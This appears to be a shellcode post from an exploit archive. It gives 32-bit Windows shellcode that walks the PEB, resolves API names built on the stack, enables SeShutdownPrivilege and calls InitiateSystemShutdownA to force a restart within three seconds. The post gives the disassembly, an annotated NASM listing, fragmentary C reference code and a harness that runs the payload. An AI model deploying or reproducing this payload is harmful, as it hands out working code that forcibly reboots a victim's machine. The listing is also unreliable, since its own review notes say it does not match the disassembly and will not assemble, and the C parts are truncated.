	# Title: Windows x86 InitiateSystemShutdownA() shellcode
	# Date : 18-08-2016
	# Author : Roziul Hasan Khan Shifat
	# Tested on : Windows 7 x86 starter

Disassembly of section .text:

00000000 <_start>:
   0:	31 c9                	xor    %ecx,%ecx
   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
   6:	8b 40 0c             	mov    0xc(%eax),%eax
   9:	8b 70 14             	mov    0x14(%eax),%esi
   c:	ad                   	lods   %ds:(%esi),%eax
   d:	96                   	xchg   %eax,%esi
   e:	ad                   	lods   %ds:(%esi),%eax
   f:	8b 48 10             	mov    0x10(%eax),%ecx
  12:	8b 59 3c             	mov    0x3c(%ecx),%ebx
  15:	01 cb                	add    %ecx,%ebx
  17:	8b 5b 78             	mov    0x78(%ebx),%ebx
  1a:	01 cb                	add    %ecx,%ebx
  1c:	8b 73 20             	mov    0x20(%ebx),%esi
  1f:	01 ce                	add    %ecx,%esi
  21:	31 d2                	xor    %edx,%edx

00000023 <g>:
  23:	42                   	inc    %edx
  24:	ad                   	lods   %ds:(%esi),%eax
  25:	01 c8                	add    %ecx,%eax
  27:	81 38 47 65 74 50    	cmpl   $0x50746547,(%eax)
  2d:	75 f4                	jne    23 <g>
  2f:	81 78 04 72 6f 63 41 	cmpl   $0x41636f72,0x4(%eax)
  36:	75 eb                	jne    23 <g>
  38:	81 78 08 64 64 72 65 	cmpl   $0x65726464,0x8(%eax)
  3f:	75 e2                	jne    23 <g>
  41:	8b 73 1c             	mov    0x1c(%ebx),%esi
  44:	01 ce                	add    %ecx,%esi
  46:	8b 14 96             	mov    (%esi,%edx,4),%edx
  49:	01 ca                	add    %ecx,%edx
  4b:	89 cf                	mov    %ecx,%edi
  4d:	31 c0                	xor    %eax,%eax
  4f:	50                   	push   %eax
  50:	83 ec 1c             	sub    $0x1c,%esp
  53:	8d 34 24             	lea    (%esp),%esi
  56:	89 16                	mov    %edx,(%esi)
  58:	50                   	push   %eax
  59:	68 6f 6b 65 6e       	push   $0x6e656b6f
  5e:	68 65 73 73 54       	push   $0x54737365
  63:	68 50 72 6f 63       	push   $0x636f7250
  68:	68 4f 70 65 6e       	push   $0x6e65704f
  6d:	8d 04 24             	lea    (%esp),%eax
  70:	50                   	push   %eax
  71:	51                   	push   %ecx
  72:	ff d2                	call   *%edx
  74:	89 46 04             	mov    %eax,0x4(%esi)
  77:	83 c4 10             	add    $0x10,%esp
  7a:	31 c9                	xor    %ecx,%ecx
  7c:	68 73 41 42 42       	push   $0x42424173
  81:	88 4c 24 01          	mov    %cl,0x1(%esp)
  85:	68 6f 63 65 73       	push   $0x7365636f
  8a:	68 6e 74 50 72       	push   $0x7250746e
  8f:	68 75 72 72 65       	push   $0x65727275
  94:	68 47 65 74 43       	push   $0x43746547
  99:	8d 0c 24             	lea    (%esp),%ecx
  9c:	51                   	push   %ecx
  9d:	57                   	push   %edi
  9e:	8b 16                	mov    (%esi),%edx
  a0:	ff d2                	call   *%edx
  a2:	83 c4 14             	add    $0x14,%esp
  a5:	89 46 08             	mov    %eax,0x8(%esi)
  a8:	31 c9                	xor    %ecx,%ecx
  aa:	68 65 73 73 41       	push   $0x41737365
  af:	88 4c 24 03          	mov    %cl,0x3(%esp)
  b3:	68 50 72 6f 63       	push   $0x636f7250
  b8:	68 45 78 69 74       	push   $0x74697845
  bd:	8d 0c 24             	lea    (%esp),%ecx
  c0:	51                   	push   %ecx
  c1:	57                   	push   %edi
  c2:	8b 16                	mov    (%esi),%edx
  c4:	ff d2                	call   *%edx
  c6:	83 c4 0c             	add    $0xc,%esp
  c9:	89 46 0c             	mov    %eax,0xc(%esi)
  cc:	31 c9                	xor    %ecx,%ecx
  ce:	51                   	push   %ecx
  cf:	68 61 72 79 41       	push   $0x41797261
  d4:	68 4c 69 62 72       	push   $0x7262694c
  d9:	68 4c 6f 61 64       	push   $0x64616f4c
  de:	8d 0c 24             	lea    (%esp),%ecx
  e1:	51                   	push   %ecx
  e2:	57                   	push   %edi
  e3:	8b 16                	mov    (%esi),%edx
  e5:	ff d2                	call   *%edx
  e7:	83 c4 0c             	add    $0xc,%esp
  ea:	68 2e 64 6c 6c       	push   $0x6c6c642e
  ef:	68 70 69 33 32       	push   $0x32336970
  f4:	68 61 64 76 61       	push   $0x61766461
  f9:	8d 0c 24             	lea    (%esp),%ecx
  fc:	51                   	push   %ecx
  fd:	ff d0                	call   *%eax
  ff:	83 c4 0c             	add    $0xc,%esp
 102:	89 c7                	mov    %eax,%edi
 104:	31 c9                	xor    %ecx,%ecx
 106:	68 41 42 42 42       	push   $0x42424241
 10b:	88 4c 24 01          	mov    %cl,0x1(%esp)
 10f:	68 61 6c 75 65       	push   $0x65756c61
 114:	68 65 67 65 56       	push   $0x56656765
 119:	68 69 76 69 6c       	push   $0x6c697669
 11e:	68 75 70 50 72       	push   $0x72507075
 123:	68 4c 6f 6f 6b       	push   $0x6b6f6f4c
 128:	8d 0c 24             	lea    (%esp),%ecx
 12b:	51                   	push   %ecx
 12c:	50                   	push   %eax
 12d:	8b 16                	mov    (%esi),%edx
 12f:	ff d2                	call   *%edx
 131:	83 c4 18             	add    $0x18,%esp
 134:	89 46 10             	mov    %eax,0x10(%esi)
 137:	31 c9                	xor    %ecx,%ecx
 139:	68 73 41 41 41       	push   $0x41414173
 13e:	88 4c 24 01          	mov    %cl,0x1(%esp)
 142:	68 6c 65 67 65       	push   $0x6567656c
 147:	68 72 69 76 69       	push   $0x69766972
 14c:	68 6b 65 6e 50       	push   $0x506e656b
 151:	68 73 74 54 6f       	push   $0x6f547473
 156:	68 41 64 6a 75       	push   $0x756a6441
 15b:	8d 0c 24             	lea    (%esp),%ecx
 15e:	51                   	push   %ecx
 15f:	57                   	push   %edi
 160:	8b 16                	mov    (%esi),%edx
 162:	ff d2                	call   *%edx
 164:	83 c4 18             	add    $0x18,%esp
 167:	89 46 14             	mov    %eax,0x14(%esi)
 16a:	31 c9                	xor    %ecx,%ecx
 16c:	68 77 6e 41 42       	push   $0x42416e77
 171:	88 4c 24 03          	mov    %cl,0x3(%esp)
 175:	68 75 74 64 6f       	push   $0x6f647475
 17a:	68 65 6d 53 68       	push   $0x68536d65
 17f:	68 53 79 73 74       	push   $0x74737953
 184:	68 69 61 74 65       	push   $0x65746169
 189:	68 49 6e 69 74       	push   $0x74696e49
 18e:	8d 0c 24             	lea    (%esp),%ecx
 191:	51                   	push   %ecx
 192:	57                   	push   %edi
 193:	8b 16                	mov    (%esi),%edx
 195:	ff d2                	call   *%edx
 197:	83 c4 18             	add    $0x18,%esp
 19a:	89 46 18             	mov    %eax,0x18(%esi)
 19d:	31 c0                	xor    %eax,%eax
 19f:	50                   	push   %eax
 1a0:	83 ec 14             	sub    $0x14,%esp
 1a3:	8d 3c 24             	lea    (%esp),%edi

000001a6 <proc_start>:
 1a6:	8b 46 08             	mov    0x8(%esi),%eax
 1a9:	ff d0                	call   *%eax
 1ab:	31 d2                	xor    %edx,%edx
 1ad:	8d 17                	lea    (%edi),%edx
 1af:	52                   	push   %edx
 1b0:	31 c9                	xor    %ecx,%ecx
 1b2:	b1 28                	mov    $0x28,%cl
 1b4:	51                   	push   %ecx
 1b5:	50                   	push   %eax
 1b6:	8b 4e 04             	mov    0x4(%esi),%ecx
 1b9:	ff d1                	call   *%ecx
 1bb:	8d 57 04             	lea    0x4(%edi),%edx
 1be:	8d 52 04             	lea    0x4(%edx),%edx
 1c1:	8d 12                	lea    (%edx),%edx
 1c3:	31 c9                	xor    %ecx,%ecx
 1c5:	68 65 67 65 41       	push   $0x41656765
 1ca:	88 4c 24 03          	mov    %cl,0x3(%esp)
 1ce:	68 69 76 69 6c       	push   $0x6c697669
 1d3:	68 77 6e 50 72       	push   $0x72506e77
 1d8:	68 75 74 64 6f       	push   $0x6f647475
 1dd:	68 53 65 53 68       	push   $0x68536553
 1e2:	8d 0c 24             	lea    (%esp),%ecx
 1e5:	31 db                	xor    %ebx,%ebx
 1e7:	52                   	push   %edx
 1e8:	51                   	push   %ecx
 1e9:	53                   	push   %ebx
 1ea:	8b 5e 10             	mov    0x10(%esi),%ebx
 1ed:	ff d3                	call   *%ebx
 1ef:	8d 57 04             	lea    0x4(%edi),%edx
 1f2:	31 c9                	xor    %ecx,%ecx
 1f4:	41                   	inc    %ecx
 1f5:	89 0a                	mov    %ecx,(%edx)
 1f7:	8d 52 04             	lea    0x4(%edx),%edx
 1fa:	41                   	inc    %ecx
 1fb:	89 4a 08             	mov    %ecx,0x8(%edx)
 1fe:	31 d2                	xor    %edx,%edx
 200:	52                   	push   %edx
 201:	52                   	push   %edx
 202:	52                   	push   %edx
 203:	8d 57 04             	lea    0x4(%edi),%edx
 206:	52                   	push   %edx
 207:	31 d2                	xor    %edx,%edx
 209:	52                   	push   %edx
 20a:	8b 17                	mov    (%edi),%edx
 20c:	52                   	push   %edx
 20d:	8b 56 14             	mov    0x14(%esi),%edx
 210:	ff d2                	call   *%edx
 212:	31 c9                	xor    %ecx,%ecx
 214:	51                   	push   %ecx
 215:	68 6e 64 73 21       	push   $0x2173646e
 21a:	68 73 65 63 6f       	push   $0x6f636573
 21f:	68 41 20 33 20       	push   $0x20332041
 224:	68 6d 2e 45 54       	push   $0x54452e6d
 229:	68 79 73 74 65       	push   $0x65747379
 22e:	68 6e 67 20 53       	push   $0x5320676e
 233:	68 61 72 74 49       	push   $0x49747261
 238:	68 52 65 73 74       	push   $0x74736552
 23d:	8d 1c 24             	lea    (%esp),%ebx
 240:	41                   	inc    %ecx
 241:	51                   	push   %ecx
 242:	31 c9                	xor    %ecx,%ecx
 244:	51                   	push   %ecx
 245:	b1 03                	mov    $0x3,%cl
 247:	51                   	push   %ecx
 248:	53                   	push   %ebx
 249:	31 c9                	xor    %ecx,%ecx
 24b:	51                   	push   %ecx
 24c:	8b 4e 18             	mov    0x18(%esi),%ecx
 24f:	ff d1                	call   *%ecx
 251:	8b 4e 0c             	mov    0xc(%esi),%ecx
 254:	50                   	push   %eax
 255:	ff d1                	call   *%ecx


HANDLE 4 bytes

LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"

required functions:

1.  WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);

3.  WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4.  WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5.  WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);

8. LoadLibraryA() [used once]

required dll:




required macro and custom data types:

	 typedef struct _TOKEN_PRIVILEGES {
      DWORD PrivilegeCount;
	 typedef struct _LUID_AND_ATTRIBUTES {
      LUID Luid;
      DWORD Attributes;
	 typedef struct _LUID {
    DWORD LowPart;
    LONG HighPart;

C code:

#include <windows.h>

int main(){
	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
	return 0;
	AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);

section .text
	global _start

;-----------------------------------------------------------------------
; Windows x86 InitiateSystemShutdownA() shellcode (NASM, Intel syntax)
; Target : 32-bit Windows; author tested on Windows 7 x86 Starter.
; Flow   : locate kernel32.dll through the PEB loader list, scan its
;          export name table for "GetProcAddre", resolve the remaining
;          imports by name, then
;          GetCurrentProcess -> OpenProcessToken -> LookupPrivilegeValueA
;          -> AdjustTokenPrivileges (SeShutdownPrivilege)
;          -> InitiateSystemShutdownA -> ExitProcess.
; ABI    : every callee is stdcall (the callee pops its arguments); the
;          name strings are built on the stack with push and only
;          partly popped afterwards, so esp drifts downward.  The
;          leftover zero dwords appear to be reused as terminators
;          (see the LoadLibraryA / "advapi32.dll" notes below).
; Registers once the pointer table is set up:
;   esi = 32-byte table of resolved function pointers (offsets listed
;         after the resolution phase)
;   edi = kernel32 base during resolution, then advapi32 base, and
;         finally the HANDLE + TOKEN_PRIVILEGES scratch area
;   ecx = kernel32 base while resolving from kernel32
; No return value is ever checked.  The constants are chosen so the
; encoded instructions contain no 00 byte (none appears in the objdump
; above); single zero bytes are written at run time with
; mov [esp+n],byte cl instead.
; NOTE(review): this listing does not match the objdump above.  The
; disassembly shows lodsd at 0xc, 0xe and 0x24, an add ebx,ecx at 0x1a,
; and the labels _start, g and proc_start, none of which appear here.
; As printed, `jnz g` has no target and `global _start` names an
; undefined label, so this source does not assemble unmodified.
; Detection note: the fs:[0x30] -> Ldr -> InMemoryOrderModuleList walk,
; the export-name scan for GetProcAddress and the stack-built ASCII
; strings are a textbook position-independent shellcode pattern that
; memory scanners and emulators key on.
;-----------------------------------------------------------------------

xor ecx,ecx ;ecx = 0, used as the (zero) index in the fs: load below

mov eax,[fs:ecx+0x30] ;PEB (TEB+0x30 on 32-bit Windows)
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList (Flink of the first entry)
xchg esi,eax ;NOTE(review): the objdump shows a lodsd before and after this xchg; without them eax is still the first list entry, not kernel32's
mov ecx,[eax+0x10] ;kernel32.dll base address (DllBase is +0x10 from the InMemoryOrder link)

mov ebx,[ecx+0x3c] ;DOS->e_lfanew (RVA of IMAGE_NT_HEADERS)
add ebx,ecx ;PE HEADER (ebx = VA of IMAGE_NT_HEADERS)
mov ebx,[ebx+0x78] ;DataDirectory[0].VirtualAddress = export directory RVA
;NOTE(review): the objdump shows add ebx,ecx here (RVA -> VA); it is missing from this listing

mov esi,[ebx+0x20] ;AddressOfNames (RVA of the name-pointer array)
add esi,ecx ;esi = VA of the name-pointer array

xor edx,edx ;edx = running index into the name table

;Export-name scan loop (label g in the objdump).  The index is
;pre-incremented, so a match at name-table position i leaves edx = i+1.
inc edx
add eax,ecx ;eax = VA of the current name (the objdump shows a lodsd feeding eax just before this)
cmp dword [eax],'GetP' ;prefix compare: only "GetProcAddre" is checked, the trailing "ss" is not
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g

mov esi,[ebx+0x1c] ;AddressOfFunctions (RVA of the function-address array)
add esi,ecx

;AddressOfNameOrdinals (+0x24) is never consulted: this indexes the
;function array with the name index + 1 directly, which is tied to the
;ordinal layout of the tested kernel32 build and not guaranteed by the
;PE format — TODO confirm before reading this as a general technique.
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress() (VA)

mov edi,ecx ;kernel32.dll base, kept in edi across the GetProcAddress calls

;Reserve a 32-byte pointer table: one zero dword pushed plus 28 bytes.
xor eax,eax
push eax
sub esp,28

lea esi,[esp] ;esi = pointer table (see the offset list after the resolution phase)

mov [esi],dword edx ;GetProcAddress() at offset 0

;finding address of OpenProcessToken()
;NOTE(review): OpenProcessToken is documented as an advapi32 export; here it is
;resolved from kernel32, which only works where that kernel32 build exports
;(forwards) it — the author's Windows 7 test is the only evidence on this page.

push eax ;eax is still 0: string terminator
push 0x6e656b6f ;"oken"
push 0x54737365 ;"essT"
push 0x636f7250 ;"Proc"
push 0x6e65704f ;"Open"  -> "OpenProcessToken"

lea eax,[esp] ;eax = lpProcName
push eax
push ecx ;hModule = kernel32 base

call edx ;GetProcAddress(kernel32, "OpenProcessToken")
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10 ;pops the four name dwords only; the terminator dword stays on the stack

;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173 ;"sABB"
mov [esp+1],byte cl ;-> "s\0BB": terminates the name without a 00 byte in the code
push 0x7365636f ;"oces"
push 0x7250746e ;"ntPr"
push 0x65727275 ;"urre"
push 0x43746547 ;"GetC" -> "GetCurrentProcess"

lea ecx,[esp] ;ecx = lpProcName
push ecx
push edi ;hModule = kernel32 base

mov edx,dword [esi] ;GetProcAddress() from the table
call edx
add esp,20 ;pops all five name dwords
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8

;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365 ;"essA"
mov [esp+3],byte cl ;-> "ess\0"
push 0x636f7250 ;"Proc"
push 0x74697845 ;"Exit" -> "ExitProcess"

lea ecx,[esp]

push ecx ;lpProcName
push edi ;hModule = kernel32 base
mov edx,dword [esi]
call edx
add esp,12 ;pops the three name dwords
mov [esi+12],dword eax ;ExitProcess() at offset 12

;finding address of LoadLibraryA()
xor ecx,ecx
push ecx ;zero terminator; NOTE: it is left on the stack below and ends up right after "advapi32.dll"
push 0x41797261 ;"aryA"
push 0x7262694c ;"Libr"
push 0x64616f4c ;"Load" -> "LoadLibraryA"

lea ecx,[esp] ;lpProcName
push ecx
push edi ;hModule = kernel32 base

mov edx,dword [esi]
call edx
add esp,12 ;pops only the three name dwords; the zero dword remains

;LoadLibraryA("advapi32.dll") — the string itself carries no terminator;
;it appears to rely on the zero dword left over just above.
push 0x6c6c642e ;".dll"
push 0x32336970 ;"pi32"
push 0x61766461 ;"adva" -> "advapi32.dll"

lea ecx,[esp] ;lpLibFileName
push ecx
call eax ;eax = LoadLibraryA() from the previous lookup
add esp,12
mov edi,eax ; advapi32.dll module handle (base), used for the lookups below
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241 ;"ABBB"
mov [esp+1],byte cl ;-> "A\0BB"
push 0x65756c61 ;"alue"
push 0x56656765 ;"egeV"
push 0x6c697669 ;"ivil"
push 0x72507075 ;"upPr"
push 0x6b6f6f4c ;"Look" -> "LookupPrivilegeValueA"

lea ecx,[esp] ;lpProcName
push ecx
push eax ;hModule = advapi32 (same value as edi)

mov edx,dword [esi]
call edx

add esp,0x18 ;pops all six name dwords
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16

;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173 ;"sAAA"
mov [esp+1],byte cl ;-> "s\0AA"
push 0x6567656c ;"lege"
push 0x69766972 ;"rivi"
push 0x506e656b ;"kenP"
push 0x6f547473 ;"stTo"
push 0x756a6441 ;"Adju" -> "AdjustTokenPrivileges"

lea ecx,[esp] ;lpProcName
push ecx
push edi ;hModule = advapi32

mov edx,dword [esi]
call edx
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20

;finding address of InitiateSystemShutdownA()

xor ecx,ecx
push 0x42416e77 ;"wnAB"
mov [esp+3],byte cl ;-> "wnA\0"
push 0x6f647475 ;"utdo"
push 0x68536d65 ;"emSh"
push 0x74737953 ;"Syst"
push 0x65746169 ;"iate"
push 0x74696e49 ;"Init" -> "InitiateSystemShutdownA"

lea ecx,[esp] ;lpProcName
push ecx
push edi ;hModule = advapi32

mov edx,dword [esi]
call edx
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24

;Scratch area for the privilege calls: one zero dword plus 20 bytes.
;Layout from edi: [edi]    HANDLE hToken
;                 [edi+4]  TOKEN_PRIVILEGES.PrivilegeCount
;                 [edi+8]  Privileges[0].Luid (8 bytes)
;                 [edi+16] Privileges[0].Attributes
;                 [edi+20] the zero dword pushed here
xor eax,eax
push eax

sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address

;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24



;proc_start in the objdump: the resolution phase is over, edi is now the scratch area.
mov eax,[esi+8]
call eax ;eax = GetCurrentProcess() pseudo-handle


xor edx,edx ;redundant: edx is overwritten by the lea on the next line
lea edx,[edi] ;edx = &hToken
push edx ;TokenHandle
xor ecx,ecx
mov cl,40 ;0x28 = TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x8), as in the C reference above

push ecx ;DesiredAccess
push eax ;ProcessHandle

mov ecx,[esi+4]
call ecx ;OpenProcessToken(hProc, 0x28, &hToken); the BOOL result is not checked (the C reference returns on failure)


;edx = edi+8 = &Privileges[0].Luid (the three lea's below add 4, 4 and 0)
lea edx,[edi+4]
lea edx,[edx+4]

lea edx,[edx] ;no-op

xor ecx,ecx

push 0x41656765 ;"egeA"
mov [esp+3],byte cl ;-> "ege\0"
push 0x6c697669 ;"ivil"
push 0x72506e77 ;"wnPr"
push 0x6f647475 ;"utdo"
push 0x68536553 ;"SeSh" -> "SeShutdownPrivilege" (SE_SHUTDOWN_NAME)

lea ecx,[esp] ;ecx = lpName

xor ebx,ebx ;lpSystemName = NULL (local machine)

push edx ;lpLuid
push ecx ;lpName
push ebx ;lpSystemName

mov ebx,[esi+16]
call ebx ;LookupPrivilegeValueA(NULL, "SeShutdownPrivilege", &Luid); the 20-byte name buffer is never popped
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4] ;edx = &TOKEN_PRIVILEGES
xor ecx,ecx
inc ecx
mov [edx],dword ecx ;PrivilegeCount = 1
lea edx,[edx+4] ;edx = &Privileges[0].Luid
inc ecx
mov [edx+8],dword ecx ;Privileges[0].Attributes = 2 = SE_PRIVILEGE_ENABLED

;Arguments pushed right to left:
xor edx,edx
push edx ;ReturnLength = NULL
push edx ;PreviousState = NULL
push edx ;BufferLength = 0

lea edx,[edi+4]
push edx ;NewState = &TOKEN_PRIVILEGES

xor edx,edx
push edx ;DisableAllPrivileges = FALSE

mov edx,dword [edi]

push edx ;TokenHandle = hToken

mov edx,[esi+20]
call edx ;AdjustTokenPrivileges(...); result not checked — a TRUE return does not by itself prove the privilege was held

;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);

xor ecx,ecx

push ecx ;string terminator
push 0x2173646e ;"nds!"
push 0x6f636573 ;"seco"
push 0x20332041 ;"A 3 "
push 0x54452e6d ;"m.ET"
push 0x65747379 ;"yste"
push 0x5320676e ;"ng S"
push 0x49747261 ;"artI"
push 0x74736552 ;"Rest"

lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"

inc ecx ;bRebootAfterShutdown = 1 (restart); author's note: remove this line to shut down instead

push ecx ;bRebootAfterShutdown

xor ecx,ecx
push ecx ;bForceAppsClosed = FALSE

mov cl,3 ;3 seconds
push ecx ;dwTimeout
push ebx ;lpMessage
xor ecx,ecx
push ecx ;lpMachineName = NULL (local machine)

mov ecx,[esi+24]
call ecx ;InitiateSystemShutdownA(...) -> eax = BOOL

mov ecx,[esi+12]
push eax ;uExitCode = the BOOL just returned
call ecx ;ExitProcess(eax); never returns

char shellcode[]=\


printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();